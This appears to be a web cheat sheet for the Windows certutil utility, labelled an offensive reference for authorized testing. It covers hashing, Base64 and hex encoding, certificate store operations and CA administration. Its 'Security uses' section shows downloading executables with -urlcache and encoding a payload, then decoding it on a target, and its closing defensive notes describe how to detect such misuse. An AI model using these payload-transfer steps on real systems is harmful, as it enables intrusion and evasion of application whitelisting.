CERTUTIL
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Interactive tool: LOLBin / GTFOBins Browser
Windows Certificate Utility: Built-in tool for certificate management. Also useful for encoding, hashing, and file operations.
HASH OPERATIONS#
FILE HASHING#
certutil -hashfile file.txt # SHA1 hash (default) certutil -hashfile file.txt MD5 # MD5 hash certutil -hashfile file.txt SHA1 # SHA1 hash certutil -hashfile file.txt SHA256 # SHA256 hash certutil -hashfile file.txt SHA384 # SHA384 hash certutil -hashfile file.txt SHA512 # SHA512 hash # Verify file integrity certutil -hashfile download.exe SHA256 | findstr /v "hash"
ENCODING & DECODING#
BASE64#
certutil -encode file.txt encoded.b64 # Encode to Base64 certutil -decode encoded.b64 decoded.txt # Decode from Base64 # Encode file inline (for transfer) certutil -encode file.exe file.txt type file.txt | clip # Copy to clipboard
HEX#
certutil -encodehex file.txt hex.txt # Encode to hex certutil -decodehex hex.txt decoded.txt # Decode from hex # Hex encoding types certutil -encodehex file hex.txt 0 # Hex with address certutil -encodehex file hex.txt 1 # Hex with ASCII certutil -encodehex file hex.txt 4 # Raw hex certutil -encodehex file hex.txt 12 # Hex no spaces
FILE DOWNLOAD#
certutil -urlcache -split -f http://url/file.exe output.exe certutil -urlcache -f http://url/file.exe C:\path\file.exe # Clean URL cache certutil -urlcache * delete # Clear all cache certutil -urlcache http://url delete # Clear specific # List cached files certutil -urlcache # Show cache
CERTIFICATE MANAGEMENT#
VIEW CERTIFICATES#
certutil -store my # Personal certs certutil -store root # Trusted root CAs certutil -store CA # Intermediate CAs certutil -store -user my # User personal certs certutil -dump cert.cer # Dump cert details certutil -dump cert.pfx # Dump PFX details certutil -verify cert.cer # Verify certificate # Store locations # my - Personal # root - Trusted Root CAs # CA - Intermediate CAs # trust - Enterprise Trust # disallowed - Untrusted Certs
IMPORT & EXPORT#
certutil -addstore root cert.cer # Import to root certutil -addstore my cert.cer # Import to personal certutil -addstore -f root cert.cer # Force import certutil -delstore my "cert name" # Delete from store # Export certificate certutil -exportPFX my "cert name" export.pfx
CERTIFICATE REQUESTS#
certutil -submit request.req # Submit CSR certutil -retrieve requestID # Retrieve cert certutil -pulse # Trigger autoenroll
CERTIFICATE REVOCATION#
certutil -verify -urlfetch cert.cer # Verify with CRL certutil -CRL # Get CRL certutil -URL cert.cer # Open URL retrieval tool
CA OPERATIONS#
certutil -ca # CA info certutil -CAInfo # Detailed CA info certutil -config "CA\Name" # Specify CA certutil -getconfig # Interactive CA select certutil -ping # Ping CA service certutil -pingadmin # Ping CA admin # CA database certutil -view -out requestid,commonname # View issued certs certutil -view -restrict "disposition=20" # Pending requests certutil -view -restrict "requestid>=100" # Filter by ID
KEY OPERATIONS#
certutil -key # List key containers certutil -key -user # User key containers certutil -key -csp "Microsoft Base Cryptographic Provider v1.0" certutil -delkey containername # Delete key container certutil -verifykeys # Verify key integrity
CSP & PROVIDER INFO#
certutil -csplist # List CSPs certutil -csptest "CSP Name" # Test CSP
CRL MANAGEMENT#
certutil -addstore root crl.crl # Add CRL certutil -setreg ca\CRLDeltaPeriodUnits 1 # Configure CRL certutil -getreg ca\CRLDeltaPeriodUnits # Get CRL config
TROUBLESHOOTING#
certutil -v -verify cert.cer # Verbose verify certutil -verifyctl AuthRoot # Verify CTL certutil -syncWithWU # Sync with Windows Update certutil -generateSSTFromWU roots.sst # Download root certs # Event logging certutil -setreg chain\ChainCacheResyncFiletime @now certutil -setreg -user policy\EnableCertPaddingCheck 1
SECURITY USES#
# Download and verify hash certutil -urlcache -split -f http://url/file.exe file.exe certutil -hashfile file.exe SHA256 # Encode payload for transfer certutil -encode payload.exe payload.b64 # Decode on target certutil -decode payload.b64 payload.exe # ADS (Alternate Data Streams) - read hidden data certutil -dump file.txt:hidden
FORMAT CONVERSION#
# DER to PEM certutil -encode cert.der cert.pem # PEM to DER certutil -decode cert.pem cert.der # Extract cert from PFX (shows in console) certutil -dump cert.pfx
TEMPLATE MANAGEMENT#
certutil -template # List templates certutil -CATemplates # CA templates certutil -dstemplate "templatename" # Template details
REGISTRY OPERATIONS#
certutil -getreg # Get all registry certutil -getreg ca\* # CA registry settings certutil -setreg ca\setting value # Set registry value
QUICK REFERENCE#
# File operations certutil -hashfile file.txt SHA256 # Hash file certutil -encode file.txt file.b64 # Base64 encode certutil -decode file.b64 file.txt # Base64 decode certutil -urlcache -split -f url output # Download file # Certificate viewing certutil -store my # Personal store certutil -store root # Root CAs certutil -dump cert.cer # View certificate # Verification certutil -verify cert.cer # Verify cert certutil -verify -urlfetch cert.cer # Verify with CRL
DEFENSIVE NOTES#
# Certutil is often used by attackers for: # - Downloading malicious files # - Encoding/decoding payloads # - Bypassing application whitelisting # Monitor for suspicious certutil usage: # - certutil -urlcache (file downloads) # - certutil -encode/-decode (payload handling) # - Execution from temp directories # Detection: Look for Event ID 4688 (process creation) # with certutil.exe and suspicious arguments